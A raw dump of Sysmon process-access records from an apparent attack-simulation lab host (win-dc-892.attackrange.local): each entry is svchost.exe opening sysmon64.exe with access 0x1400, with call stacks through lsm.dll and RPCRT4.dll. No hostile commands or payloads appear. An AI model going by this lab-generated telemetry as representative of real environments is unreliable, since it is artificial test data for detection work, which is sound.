12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 